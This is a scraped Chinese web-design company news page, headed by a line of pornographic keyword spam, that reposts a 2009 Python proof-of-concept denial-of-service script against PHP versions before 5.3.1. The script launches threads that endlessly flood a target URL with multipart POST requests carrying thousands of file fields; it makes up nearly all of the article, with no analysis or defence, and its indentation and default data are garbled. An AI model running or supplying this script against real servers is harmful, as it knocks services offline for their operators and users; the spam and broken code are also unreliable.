日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
PHP5.3.1版本之前的拒絕服務(wù)攻擊漏洞(附測(cè)試代碼)
Code:
# 
# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 
# Bogdan Calin (bogdan@acunetix.com) 
# 
import httplib, urllib, sys, string, threading 
from string import replace 
from urlparse import urlparse 

def usage(): 
        print "****************************************************************************" 
        print " PHP MultiPart Form-Data Denial of Service proof of concept" 
        print " Bogdan Calin (bogdan@acunetix.com)" 
        print "" 
        print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" 
        print ""         
        print "  [number_of_threads] - optional, default 10"         
        print "  [number_of_files] - optional, default 15000"                 
        print "  [data] - content of the files, by default it will create files containing" 
        print "           the string 
     " 
        print ""                 
        print " Example: php_mpfd_dos.pyhttp://ubuntu/index.php"         
        print "****************************************************************************" 
         
class PhpMPFDDosThread ( threading.Thread ): 
        # Override Thread's __init__ method to accept the parameters needed: 
        def __init__ ( self, host, path, files ):         
                self.host = host 
                self.path = path 
                self.files = files 
                threading.Thread.__init__ ( self )                 

        # run in loop 
        def run(self): 
                while(1): 
                        try: 
                                self.post_data() 
                        except: 
                                print "*", 
                 
        # post multipart_formdata         
        def post_data(self):         
            content_type, body = self.encode_multipart_formdata() 
            h = httplib.HTTPConnection(self.host) 
            headers = { 
                'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', 
                'Accept': '*/*', 
                'Content-Type': content_type 
                } 
            h.request('POST', self.path, body, headers) 
            print ".", 

        # encode multipart_formdata 
        def encode_multipart_formdata(self): 
                """ 
                adapted fromhttp://code.activestate.com/recipes/146306/ 
                files is a sequence of (name, filename, value) elements for data to be uploaded as files 
                Return (content_type, body) ready for httplib.HTTP instance 
                """ 
                BOUNDARY = '----------PHP_MPFD_DOS' 
                CRLF = '\r\n' 
                L = [] 
                for (key, filename, value) in self.files: 
                L.append('--' + BOUNDARY) 
                L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 
                L.append('Content-Type: application/octet-stream') 
                L.append('') 
                L.append(value) 
                L.append('--' + BOUNDARY + '--') 
                L.append('') 
                body = CRLF.join(L) 
                content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 
                return content_type, body 

def main():     
        if len(sys.argv)<=1: 
                usage() 
                sys.exit() 

        # default values 
        number_of_threads = 10 
        number_of_files = 15000 
        data = "
     " 
         
        if len(sys.argv)>2: 
                number_of_threads = int(sys.argv[2]) 

        if len(sys.argv)>3: 
                number_of_files = int(sys.argv[3]) 

        if len(sys.argv)>4: 
                data = sys.argv[4]         
         
        url = sys.argv[1] 
        print "[-] target: " + url 

        # parse target url 
        up = urlparse(url) 
        host = up.netloc 
        path = up.path 

        # prepare files 
        files = [] 
        for i in range(0, number_of_files): 
                files.append(('fu[]', 'f'+str(i), data)) 
         
        # start the threads 
        for x in xrange ( number_of_threads ): 
                PhpMPFDDosThread(host, path, files).start() 

if __name__ == '__main__': 
    main()

【編輯推薦】

十年的烏海海南網(wǎng)站建設(shè)經(jīng)驗(yàn),針對(duì)設(shè)計(jì)、前端、開發(fā)、售后、文案、推廣等六對(duì)一服務(wù),響應(yīng)快,48小時(shí)及時(shí)工作處理。全網(wǎng)營(yíng)銷推廣的優(yōu)勢(shì)是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動(dòng)調(diào)整烏海海南建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。創(chuàng)新互聯(lián)從事“烏海海南網(wǎng)站設(shè)計(jì)”,“烏海海南網(wǎng)站推廣”以來,每個(gè)客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。

  1. Windows下PHP+MySQL+IIS安全平臺(tái)III 變態(tài)配置
  2. php應(yīng)用程序安全防范技術(shù)研究

分享文章:PHP5.3.1版本之前的拒絕服務(wù)攻擊漏洞(附測(cè)試代碼)
標(biāo)題路徑:http://www.dlmjj.cn/article/dpjiecd.html